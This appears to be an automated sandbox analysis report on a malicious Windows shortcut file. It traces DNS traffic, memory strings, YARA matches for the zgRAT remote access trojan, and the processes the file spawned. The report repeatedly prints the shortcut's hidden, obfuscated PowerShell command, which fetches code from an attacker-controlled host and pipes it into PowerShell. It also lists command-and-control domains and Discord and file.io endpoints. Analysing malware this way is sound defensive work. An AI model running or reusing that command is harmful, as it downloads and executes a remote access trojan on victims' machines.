                Source: nslookup.exe, 00000004.00000002.1379267470.000001942A770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Windows\system32\nslookup.exe" www.yahoo.com equals www.yahoo.com (Yahoo)
                Source: ConDrv.4.drString found in binary or memory: Aliases: www.yahoo.com equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000000.00000002.3889819595.0000020571230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\Desktop\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|PowershellC:\Users\user\Desktop\BX7yRz7XqF.lnkWinsta0\Default equals www.yahoo.com (Yahoo)
                Source: nslookup.exe, 00000004.00000002.1379267470.000001942A770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\Desktop\C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exe" www.yahoo.comC:\Windows\system32\nslookup.exeWinsta0\DefaultT equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000000.00000002.3893130672.0000020572D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3895148907.0000020573340000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3889819595.0000020571237000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-noLOG-WInDoWSTHIDDe-NoeXI-NoprOFILE-noniNtErac-CommaNpingwww.nadra.gov.pk;nslookupwww.yahoo.com;nslookupwww.protonmail.com;starthttps://pmo.gov.pk/site/404;$id='ftroof.top/';&('i'+'r'+'m')http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000000.00000002.3892359354.0000020571380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-noLOG-WInDoWSTHIDDe-NoeXI-NoprOFILE-noniNtErac-CommaNpingwww.nadra.gov.pk;nslookupwww.yahoo.com;nslookupwww.protonmail.com;starthttps://pmo.gov.pk/site/404;$id='ftroof.top/';&('i'+'r'+'m')http://pmofficepakistancloudserver.shi$id/WinSysMgr/|PowershellPUBLIC=C equals www.yahoo.com (Yahoo)
                Source: nslookup.exe, 00000004.00000002.1379343279.000001942AA50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Windows\system32\nslookup.exewww.yahoo.comt equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000000.00000002.3898543575.0000020573560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: em32\windowspowershell\v1.0\powershell.exe" -nolog -windowst hidde -noexi -noprofile -noninterac -comman ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/winsysmgr/|powershell equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000000.00000002.3806263511.0000020500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000000.00000002.3806263511.0000020500234000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000004.00000002.1379343279.000001942AA50000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000004.00000002.1379343279.000001942AA54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
                Source: nslookup.exe, 00000004.00000002.1379343279.000001942AA54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com207::1ww.g06.yahoodns.net equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000000.00000002.3893130672.0000020572D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3806263511.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3895148907.0000020573340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.yahoo.com; equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: www.nadra.gov.pk
                Source: global trafficDNS traffic detected: DNS query: 1.1.1.1.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.yahoo.com
                Source: global trafficDNS traffic detected: DNS query: www.protonmail.com
                Source: global trafficDNS traffic detected: DNS query: pmofficepakistancloudserver.shiftroof.top
                Source: global trafficDNS traffic detected: DNS query: pmo.gov.pk
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: ofc.mofserviceserver.top
                Source: global trafficDNS traffic detected: DNS query: cloud.dellicon.top
                Source: global trafficDNS traffic detected: DNS query: gateway.discord.gg
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:58:41 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5t5gXkthIkgQZWWQwCczNmQmbGxiddKQM2myo9PGXpxLUu22LuY8NQZhUlpsHtp7vfKIoJISDOYTJCrNMyW0SMpVO3JGFxntGFzGAeMvor%2Bd5ELnlKkxj05pgz6%2BAU2v27VHLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8cb5c258ea3c4315-EWR
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B137C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cloud.dellicon.top
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B137C000.00000004.00000800.00020000.00000000.sdmp, ConDrv.15.drString found in binary or memory: http://cloud.dellicon.top/1000/500/
                Source: svchost.exe, 00000008.00000002.3809924179.000002384C800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: svchost.exe, 00000008.00000002.3810717471.000002384C8CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: svchost.exe, 00000008.00000002.3810056014.000002384C82C000.00000004.00000020.00020000.00000000.sdmp, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
                Source: svchost.exe, 00000008.00000002.3810352798.000002384C88D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
                Source: svchost.exe, 00000008.00000002.3810352798.000002384C861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
                Source: svchost.exe, 00000008.00000002.3810352798.000002384C861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80gL$
                Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gateway.discord.gg
                Source: powershell.exe, 00000000.00000002.3879782353.0000020510072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3879782353.00000205101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3806263511.0000020501A8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.00000248003DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1463269695.0000024810092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1463269695.00000248101C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000A.00000002.1446930048.000002480162F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ofc.mofserviceserver.t
                Source: powershell.exe, 00000000.00000002.3806263511.0000020501980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.000002480162F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ofc.mofserviceserver.top/DSCT
                Source: cmd.exe, 0000000B.00000002.1442577782.00000207CCBEB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000003.1440233846.00000207CCEE5000.00000004.00000020.00020000.00000000.sdmp, ConDrv.10.drString found in binary or memory: http://ofc.mofserviceserver.top/DSCTSC/
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B2C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000000.00000002.3806263511.0000020500234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pmofficepakistancloudserver.shi
                Source: powershell.exe, 00000000.00000002.3889819595.0000020571230000.00000004.00000020.00020000.00000000.sdmp, BX7yRz7XqF.lnkString found in binary or memory: http://pmofficepakistancloudserver.shi$id/WinSysMgr/
                Source: powershell.exe, 00000000.00000002.3898543575.0000020573560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pmofficepakistancloudserver.shi$id/winsysmgr/
                Source: powershell.exe, 00000000.00000002.3806263511.000002050195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3806263511.00000205014EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pmofficepakistancloudserver.shiftroof.top
                Source: powershell.exe, 00000000.00000002.3806263511.00000205014EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pmofficepakistancloudserver.shiftroof.top//WinSysMgr/
                Source: powershell.exe, 00000000.00000002.3806263511.0000020500E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pmofficepakistancloudserver.shiftroof.top//WinSysMgr/the
                Source: powershell.exe, 00000000.00000002.3806263511.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.0000024800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B10B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000A.00000002.1446930048.00000248019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B2C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000000.00000002.3898678743.0000020573660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                Source: powershell.exe, 0000000F.00000002.1672029257.000001D1C9810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 0000000F.00000002.1671863168.000001D1C9630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coC
                Source: powershell.exe, 00000000.00000002.3806263511.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.0000024800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B10B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B151A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud.dellicon.top
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1548000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B151A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloud.dellicon.top/1000/500/
                Source: powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B16E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/channels/
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B16E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B16E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://file.io/
                Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                Source: svchost.exe, 00000008.00000003.1412694467.000002384C670000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg:443/?v=9&encording=json
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B2C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000000.00000002.3806263511.00000205014EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.0000024800F42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B1C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B16E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                Source: powershell.exe, 00000000.00000002.3879782353.0000020510072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3879782353.00000205101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.00000248002E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1463269695.0000024810092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1446930048.0000024801D0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1463269695.00000248101C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B2DB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1653750682.000001D1C1143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: qmgr.db.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
                Source: powershell.exe, 0000000A.00000002.1446930048.00000248019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 0000000A.00000002.1446930048.00000248019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1601062674.000001D1B26DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: powershell.exe, 00000000.00000002.3898678743.0000020573660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3898678743.0000020573647000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3806263511.0000020500234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404
                Source: powershell.exe, 00000000.00000002.3898678743.0000020573660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404&
                Source: powershell.exe, 00000000.00000002.3889819595.0000020571230000.00000004.00000020.00020000.00000000.sdmp, BX7yRz7XqF.lnkString found in binary or memory: https://pmo.gov.pk/site/404;
                Source: powershell.exe, 00000000.00000002.3893130672.0000020572D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3895148907.0000020573340000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3892359354.0000020571380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3889819595.0000020571237000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3889819595.00000205712B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404;$id=
                Source: powershell.exe, 00000000.00000002.3889819595.00000205712B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404;W
                Source: powershell.exe, 00000000.00000002.3889819595.00000205712B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404;m
                Source: powershell.exe, 00000000.00000002.3895148907.0000020573340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404R_F_PRO
                Source: powershell.exe, 00000000.00000002.3898678743.0000020573660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pmo.gov.pk/site/404T
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 172.67.149.9:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.7:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.7:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.7:49725 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 15.2.powershell.exe.1d1c9b50000.6.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 15.2.powershell.exe.1d1c1260f78.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 8136, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Windows shortcut file (LNK) contains suspicious command line arguments
                Source: BX7yRz7XqF.lnkLNK file: -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC486D8010_2_00007FFAAC486D80
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC48EDE010_2_00007FFAAC48EDE0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC48C93B10_2_00007FFAAC48C93B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC48CA3510_2_00007FFAAC48CA35
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC48CA9010_2_00007FFAAC48CA90
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 15.2.powershell.exe.1d1c9b50000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 15.2.powershell.exe.1d1c1260f78.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0000000F.00000002.1673745614.000001D1C9B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: Process Memory Space: powershell.exe PID: 8136, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, SadyrWrGPJB6lfcrNhY.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, SadyrWrGPJB6lfcrNhY.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.2.powershell.exe.1d1c1260f78.4.raw.unpack, SadyrWrGPJB6lfcrNhY.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, SadyrWrGPJB6lfcrNhY.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, SadyrWrGPJB6lfcrNhY.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.2.powershell.exe.1d1c9b50000.6.raw.unpack, SadyrWrGPJB6lfcrNhY.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.evad.winLNK@34/25@22/11
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q2ivsxxt.i2b.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: BX7yRz7XqF.lnkReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.nadra.gov.pk
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.yahoo.com
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.protonmail.com
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1916,i,14445282091827991487,7005601379036879201,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
